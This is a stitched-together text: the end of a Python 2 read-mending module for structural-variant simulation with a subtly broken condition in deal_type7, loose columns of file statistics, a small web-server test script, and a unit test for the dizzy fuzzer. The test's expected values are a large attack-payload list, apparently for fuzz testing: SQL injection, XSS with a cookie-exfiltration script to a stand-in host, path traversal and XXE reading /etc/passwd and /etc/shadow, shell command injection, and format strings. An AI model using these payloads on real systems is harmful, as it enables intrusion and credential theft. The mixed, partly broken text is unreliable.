qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
elif svtype == "trans_chrom":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype, subPos=subPos)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
print "deal type5 end......"
return total_reads
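# Pick read-pair indices to modify at random; for frac > 1 the draw is repeated
# int(frac) + 1 times, so the same index may be returned more than once.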
def random_mendIDList(totalReadsNum, frac):
if totalReadsNum == 0:
return []
if frac <= 1:
mendList = random.sample(range(totalReadsNum), int(totalReadsNum * frac))
return mendList
elif frac > 1:
cnt = int(frac)
frac_sub = frac / (cnt + 1)
total_mendList = []
for i in range(cnt + 1):
mendList = random.sample(range(totalReadsNum), int(totalReadsNum * frac_sub))
total_mendList.extend(mendList)
return total_mendList
def deal_type6(ref, reads_type1_left, reads_type1_right, freq, start, end, svtype, subPos=None):
print "deal type6 start......"
reads_left_num = len(reads_type1_left)
reads_right_num = len(reads_type1_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type1_left[read_pair_id]
read = read_pair[0]
new_seq = None
if svtype == "del" or svtype == "inv" or svtype == "trans_balance" or svtype == "trans_unbalance":
if start - read.reference_start >= read.reference_end - start:
new_seq = mend_read_part(ref, read, start, end, "type6", "left", svtype, subPos=subPos)
else:
continue
elif svtype == "dup":
if start - read.reference_start <= read.reference_end - start:
new_seq = mend_read_part(ref, read, start, end, "type6", "left", svtype, subPos=subPos)
else:
continue
if new_seq:
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type1_right[read_pair_id]
read = read_pair[0]
new_seq = None
if svtype == "del" or svtype == "inv" or svtype == "trans_balance" or svtype == "trans_unbalance":
if end - read.reference_start <= read.reference_end - end:
new_seq = mend_read_part(ref, read, start, end, "type6", "right", svtype, subPos=subPos)
else:
continue
elif svtype == "dup":
if end - read.reference_start >= read.reference_end - end:
new_seq = mend_read_part(ref, read, start, end, "type6", "right", svtype, subPos=subPos)
else:
continue
if new_seq:
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read])
print "deal type6 end......"
return total_reads
def deal_type7(reads_type4, freq, svtype):
print "deal type7 start......"
reads_num = len(reads_type4)
reads_mend_id = random_mendIDList(reads_num, freq)
total_reads = []
if svtype == "del" or "dup" or "trans_unbalance" or svtype == "cnv":
for read_pair_id in reads_mend_id:
total_reads.append(reads_type4[read_pair_id])
return total_reads
| 49.840295
| 130
| 0.562312
| 4,998
| 40,570
| 4.239296
| 0.030612
| 0.063432
| 0.032094
| 0.02643
| 0.898999
| 0.876864
| 0.858505
| 0.852086
| 0.840665
| 0.817821
| 0
| 0.016783
| 0.342051
| 40,570
| 813
| 131
| 49.901599
| 0.776983
| 0.022628
| 0
| 0.819918
| 0
| 0
| 0.051015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005457
| null | null | 0.049113
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0fa7067603866e691c6029ce1b8b0324f544ec36
| 120
|
py
|
Python
|
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | 1
|
2021-11-04T06:28:43.000Z
|
2021-11-04T06:28:43.000Z
|
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | null | null | null |
test/test.py
|
AlanMalikov777/ass4_coin_scrapper_webpage
|
88169fe2ce087835fa24ffe075f5d735a0531eef
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("..")
from src import news
from src import web_server
from src import dbpy
web_server.start()
| 20
| 26
| 0.783333
| 21
| 120
| 4.380952
| 0.52381
| 0.228261
| 0.423913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 6
| 27
| 20
| 0.87619
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e889f10acc860bf20d9beca8b6a8febce1a4166e
| 176,445
|
py
|
Python
|
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | 1
|
2020-11-19T10:11:43.000Z
|
2020-11-19T10:11:43.000Z
|
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | null | null | null |
dizzy/tests/test_list.py
|
0xc0decafe/dizzy
|
6cf6abf7a9b990fe77618e42651f3c3d286cc15b
|
[
"BSD-3-Clause"
] | 1
|
2020-11-19T10:12:18.000Z
|
2020-11-19T10:12:18.000Z
|
# test_list.py
#
# Copyright 2017 Daniel Mende <mail@c0decafe.de>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from unittest import TestCase, main
from dizzy.tests import first
from dizzy.objects.list import List
from dizzy.value import Value
class TestList(TestCase):
def test_init(self):
f = List("test")
self.assertEqual(f.name, "test")
def test_iter(self):
expected = [Value(b'bla', 24), Value(b'', 0), Value(b'!', 8), Value(b"!'", 16), Value(b'!@#$%%^#$%#$@#$%$$@#$%^^**(()', 232),
Value(b'!@#0%^#0##018387@#0^^**(()', 208), Value(b'"', 8), Value(b'" or "a"="a', 88),
Value(b'" or "x"="x', 88), Value(b'" or 0=0 #', 80), Value(b'" or 0=0 --', 88),
Value(b'" or 1=1 or ""="', 128), Value(b'" or 1=1--', 80), Value(b'"\' or 1 --\'"', 96),
Value(b'") or ("a"="a', 104),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"', 1152),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"', 1152),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[\' or 1=1 or \'\'=\']]>'
b'</foo>"', 704),
Value(b'"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>'
b'alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"', 1104),
Value(b'"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc"">'
b'<xss:xss>XSS</xss:xss></HTML>"', 968),
Value(b'"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert(\'XSS\')""></B></I></xml>'
b'<SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml>'
b'<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"', 1720),
Value(b'"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert(\'XSS\');"">]]>"', 640),
Value(b'"><script>"', 88), Value(b'"><script>alert(1)</script>', 216),
Value(b'"><script>document.location=\'http://your.site.com/cgi-bin/cookie.cgi?\'+document.cookie'
b'</script>', 760),
Value(b'">xxx<P>yyy', 88), Value(b'"\\t"', 32), Value(b'#', 8), Value(b'#'', 56),
Value(b"#'", 16), Value(b'#xA', 24), Value(b'#xA#xD', 48), Value(b'#xD', 24), Value(b'#xD#xA', 48),
Value(b'$NULL', 40), Value(b'$null', 40), Value(b'%', 8),
Value(b'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', 512), Value(b'%00', 24),
Value(b'%00../../../../../../etc/passwd', 248), Value(b'%00../../../../../../etc/shadow', 248),
Value(b'%00/', 32), Value(b'%00/etc/passwd%00', 136), Value(b'%01%02%03%04%0a%0d%0aADSF', 200),
Value(b'%08x', 32), Value(b'%0A/usr/bin/id', 112), Value(b'%0A/usr/bin/id%0A', 136),
Value(b'%0Aid', 40), Value(b'%0Aid%0A', 64), Value(b'%0a ping -i 30 127.0.0.1 %0a', 224),
Value(b'%oa ping -n 30 127.0.0.1 %0a', 224), Value(b'%0a id %0a', 80),
Value(b'%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+'
b'<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a', 1136),
Value(b'%0d', 24),
Value(b'%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0a'
b'DATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d'
b'%0a', 1432),
Value(b'%0d%0aX-Injection-Header:%20AttackValue', 312), Value(b'%20', 24),
Value(b'%20$(sleep%2050)', 128), Value(b"%20'sleep%2050'", 120), Value(b'%20d', 32),
Value(b'%20n', 32), Value(b'%20s', 32), Value(b'%20x', 32), Value(b'%20|', 32), Value(b'%21', 24),
Value(b'%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2F'
b'cookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E', 1152),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%\t\t25%5c..%25%5c..%255cboot.ini', 1016),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%\t25%5c..%25%5c..%00', 928),
Value(b'%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25'
b'%5c..%25%5c..%25%5c..%00', 920),
Value(b'%2500', 40), Value(b'%250a', 40), Value(b'%26', 24), Value(b'%27%20or%201=1', 112),
Value(b'%28', 24), Value(b'%29', 24), Value(b'%2A', 24),
Value(b'%2A%28%7C%28mail%3D%2A%29%29', 224), Value(b'%2A%28%7C%28objectclass%3D%2A%29%29', 280),
Value(b'%2A%7C', 48), Value(b'%2C', 24), Value(b'%2e%2e%2f', 72), Value(b'%3C', 24),
Value(b'%3C%3F', 48), Value(b'%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E', 360),
Value(b'%3cscript%3ealert("XSS");%3c/script%3e', 304),
Value(b'%3cscript%3ealert(document.cookie);%3c%2fscript%3e', 400), Value(b'%5C', 24),
Value(b'%5C/', 32), Value(b'%60', 24), Value(b'%7C', 24), Value(b'%7f', 24),
Value(b'%99999999999s', 104),
Value(b'%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A'
b'%A%A%A%A%A%A%A%A%A', 864),
Value(b'%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E'
b'%E%E%E%E%E%E%E%E%E', 864),
Value(b'%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F'
b'%F%F%F%F%F%F%F%F%F', 864),
Value(b'%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G'
b'%G%G%G%G%G%G%G%G%G', 864),
Value(b'%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X'
b'%X%X%X%X%X%X%X%X%X', 864),
Value(b'%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a'
b'%a%a%a%a%a%a%a%a%a', 864),
Value(b'%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d'
b'%d%d%d%d%d%d%d%d%d ', 872),
Value(b'%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e'
b'%e%e%e%e%e%e%e%e%e', 864),
Value(b'%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f'
b'%f%f%f%f%f%f%f%f%f', 864),
Value(b'%ff', 24),
Value(b'%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g'
b'%g%g%g%g%g%g%g%g%g', 864),
Value(b'%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i'
b'%i%i%i%i%i%i%i%i%i', 864),
Value(b'%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o'
b'%o%o%o%o%o%o%o%o%o', 864),
Value(b'%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p'
b'%p%p%p%p%p%p%p%p%p', 864),
Value(b'%s%p%x%d', 64),
Value(b'%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s'
b'%s%s%s%s%s%s%s%s%s', 864),
Value(b'%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u'
b'%u%u%u%u%u%u%u%u%u', 864),
Value(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x'
b'%x%x%x%x%x%x%x%x%x', 864),
Value(b'&', 8), Value(b'& id', 32), Value(b'& ping -i 30 127.0.0.1 &', 192),
Value(b'& ping -n 30 127.0.0.1 &', 192), Value(b'<', 72), Value(b'<', 80),
Value(b'<', 64), Value(b'<', 72), Value(b'<', 56), Value(b'<', 64),
Value(b'<', 48), Value(b'<', 56), Value(b'<', 40), Value(b'<', 48),
Value(b' ', 40), Value(b' ', 80), Value(b' ', 40), Value(b' ', 80),
Value(b'<', 32), Value(b'<', 40), Value(b'<', 80), Value(b'<', 88),
Value(b'<', 80), Value(b'<', 88), Value(b'<', 72),
Value(b'<', 80), Value(b'<', 72), Value(b'<', 80), Value(b'<', 64),
Value(b'<', 72), Value(b'<', 64), Value(b'<', 72), Value(b'<', 56),
Value(b'<', 64), Value(b'<', 56), Value(b'<', 64), Value(b'<', 48),
Value(b'<', 56), Value(b'<', 48), Value(b'<', 56), Value(b'<', 40),
Value(b'<', 48), Value(b'<', 40), Value(b'<', 48), Value(b'<', 80),
Value(b'<', 88), Value(b'<', 80), Value(b'<', 88),
Value(b'<', 72), Value(b'<', 80), Value(b'<', 72),
Value(b'<', 80), Value(b'<', 64), Value(b'<', 72), Value(b'<', 64),
Value(b'<', 72), Value(b'<', 56), Value(b'<', 64), Value(b'<', 56),
Value(b'<', 64), Value(b'<', 48), Value(b'<', 56), Value(b'<', 48),
Value(b'<', 56), Value(b'<', 40), Value(b'<', 48), Value(b'<', 40),
Value(b'<', 48), Value(b'<', 24), Value(b'<', 32), Value(b''', 48),
Value(b''%20OR', 88), Value(b'&id', 24), Value(b'<', 24), Value(b'<', 32),
Value(b'<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->', 472),
Value(b'<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->', 472),
Value(b'<!--#exec%20cmd="/usr/bin/id;-->', 344),
Value(b"<>"'%;)(&+", 200),
Value(b'<script>alert(document.cookie);<script>alert', 416),
Value(b'<script>alert(document.cookie);</script>', 352), Value(b'";id"', 120),
Value(b"'", 8), Value(b"' (select top 1", 120), Value(b"' --", 32), Value(b"' ;", 24),
Value(b"' UNION ALL SELECT", 144), Value(b"' UNION SELECT", 112), Value(b"' or ''='", 72),
Value(b"' or '1'='1", 88), Value(b"' or '1'='1'--", 112), Value(b"' or 'x'='x", 88),
Value(b"' or (EXISTS)", 104), Value(b"' or 0=0 #", 80), Value(b"' or 0=0 --", 88),
Value(b"' or 1 in (@@version)--", 184), Value(b"' or 1=1 or ''='", 128), Value(b"' or 1=1--", 80),
Value(b"' or a=a--", 80), Value(b"' or uid like '%", 128), Value(b"' or uname like '%", 144),
Value(b"' or user like '%", 136), Value(b"' or userid like '%", 152),
Value(b"' or username like '%", 168), Value(b"'%20or%201=1", 96),
Value(b"'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E", 512),
Value(b'\'\';!--"<XSS>=&{()}', 144), Value(b"') or ('a'='a", 104), Value(b"'--", 24),
Value(b"'; exec master..xp_cmdshell", 216), Value(b"'; exec xp_regread", 144),
Value(b"'; waitfor delay '0:30:0'--", 216),
Value(b'\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";'
b'alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>'
b'!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}', 1856),
Value(b"';shutdown--", 96), Value(b"'><script>alert(document.cookie);</script>", 336),
Value(b"'><script>alert(document.cookie)</script>", 328), Value(b"'hi' or 'x'='x';", 128),
Value(b"'or select *", 96), Value(b"'sqlattempt1", 96), Value(b"'||UTL_HTTP.REQUEST", 152),
Value(b"'||Utl_Http.request('http://<yourservername>') from dual--", 464), Value(b'(', 8),
Value(b"(')", 24), Value(b'(sqlattempt2)', 104), Value(b')', 8), Value(b'))))))))))', 80),
Value(b'*', 8), Value(b'*&apos;', 56), Value(b"*'", 16), Value(b'*(|(mail=*))', 96),
Value(b'*(|(objectclass=*))', 152), Value(b'*/*', 24), Value(b'*|', 16), Value(b'+', 8),
Value(b'+%00', 32), Value(b',@variable', 80), Value(b'-', 8), Value(b'--', 16), Value(b"--';", 32),
Value(b'--sp_password', 104), Value(b'-1', 16), Value(b'-1.0', 32), Value(b'-2', 16),
Value(b'-20', 24), Value(b'-268435455', 80), Value(b'..%%35%63', 72), Value(b'..%%35c', 56),
Value(b'..%25%35%63', 88), Value(b'..%255c', 56), Value(b'..%5c', 40), Value(b'..%bg%qf', 64),
Value(b'..%c0%af', 64),
Value(b'..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini', 592),
Value(b'..%u2215', 64), Value(b'..%u2216', 64), Value(b'../', 24),
Value(b'../../../../../../../../../../../../etc/hosts', 360),
Value(b'../../../../../../../../../../../../etc/hosts%00', 384),
Value(b'../../../../../../../../../../../../etc/passwd', 368),
Value(b'../../../../../../../../../../../../etc/passwd%00', 392),
Value(b'../../../../../../../../../../../../etc/shadow', 368),
Value(b'../../../../../../../../../../../../etc/shadow%00', 392), Value(b'..\\', 24),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd', 320),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00', 344),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow', 320),
Value(b'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00', 344),
Value(b'.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd', 320),
Value(b'.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/shadow', 320), Value(b'/', 8),
Value(b'/%00/', 40),
Value(b'/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..'
b'%25%5c..%25%5c..%25%5c..%00', 928),
Value(b'/%2A', 32),
Value(b'/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', 648),
Value(b'/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow', 648),
Value(b'/&apos;', 56), Value(b"/'", 16), Value(b'/,%ENV,/', 64),
Value(b'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd', 616),
Value(b'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow', 616),
Value(b'/.../.../.../.../.../', 168), Value(b'/../../../../../../../../%2A', 224),
Value(b'/../../../../../../../../../../../etc/passwd%00.html', 416),
Value(b'/../../../../../../../../../../../etc/passwd%00.jpg', 408),
Value(b'/../../../../../../../../../../etc/passwd', 328),
Value(b'/../../../../../../../../../../etc/passwd^^', 344),
Value(b'/../../../../../../../../../../etc/shadow', 328),
Value(b'/../../../../../../../../../../etc/shadow^^', 344),
Value(b'/../../../../../../../../bin/id|', 256),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini', 360),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd', 376),
Value(b'/..\\../..\\../..\\../..\\../..\\../..\\../etc/shadow', 376),
Value(b'/./././././././././././etc/passwd', 264), Value(b'/./././././././././././etc/shadow', 264),
Value(b'//', 16), Value(b'//*', 24), Value(b'/etc/passwd', 88), Value(b'/etc/shadow', 88),
Value(b'/index.html|id|', 120), Value(b'0', 8), Value(b'0 or 1=1', 64), Value(b'00', 16),
Value(b'0xfffffff', 72), Value(b'1', 8), Value(b'1 or 1 in (@@version)--', 184),
Value(b'1 or 1=1--', 80), Value(b'1.0', 24), Value(b"1; waitfor delay '0:30:0'--", 216),
Value(b'1;SELECT%20*', 96),
Value(b"1||Utl_Http.request('http://<yourservername>') from dual--", 464), Value(b'2', 8),
Value(b'2147483647', 80), Value(b'268435455', 72), Value(b'65536', 40),
Value(b':response.write 111111', 176), Value(b';', 8), Value(b'; ping 127.0.0.1 ;', 144),
Value(b';/usr/bin/id\\n', 112), Value(b';echo 111111', 96), Value(b';id', 24), Value(b';id;', 32),
Value(b';id\\n', 40), Value(b';id|', 32), Value(b';ls -la', 56),
Value(b";system('/usr/bin/id')", 176), Value(b";system('cat%20/etc/passwd')", 224),
Value(b";system('id')", 104), Value(b';|/usr/bin/id|', 112), Value(b'<', 8),
Value(b'< script > < / script>', 184), Value(b'<!', 16),
Value(b"<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", 624),
Value(b'<![CDATA[<script>var n=0;while(true){n++;}</script>]]>', 432), Value(b'</foo>', 48),
Value(b'<<', 16), Value(b'<<<', 24), Value(b'<<script>alert("XSS");//<</script>', 272),
Value(b'<>"\'%;)(&+', 80), Value(b'<?', 16),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>', 1088),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
b'<!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>', 1080),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[\' or 1=1 or \'\'=\']]>'
b'</foo>', 656),
Value(b'<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>'
b'alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>', 1056),
Value(b'<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">'
b'<xss:xss>XSS</xss:xss></HTML>', 920),
Value(b'<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', 320),
Value(b'<IMG DYNSRC="javascript:alert(\'XSS\')">', 304),
Value(b'<IMG LOWSRC="javascript:alert(\'XSS\')">', 304),
Value(b'<IMG SRC="  javascript:alert(\'XSS\');">', 352),
Value(b'<IMG SRC="jav\tascript:alert(\'XSS\');">', 296),
Value(b'<IMG SRC="jav	ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="jav
ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="jav
ascript:alert(\'XSS\');">', 336),
Value(b'<IMG SRC="javascript:alert(\'XSS\')"', 272),
Value(b'<IMG SRC="javascript:alert(\'XSS\');">', 288),
Value(b'<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105'
b'&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040'
b'&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>', 1736),
Value(b'<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;'
b'&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', 1088),
Value(b'<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72'
b'&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>', 1000),
Value(b"<IMG SRC=JaVaScRiPt:alert('XSS')>", 264),
Value(b'<IMG SRC=`javascript:alert("\'XSS\'")`>', 296),
Value(b'<IMG SRC=javascript:alert("XSS")>', 344),
Value(b"<IMG SRC=javascript:alert('XSS')>", 264),
Value(b'<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', 456),
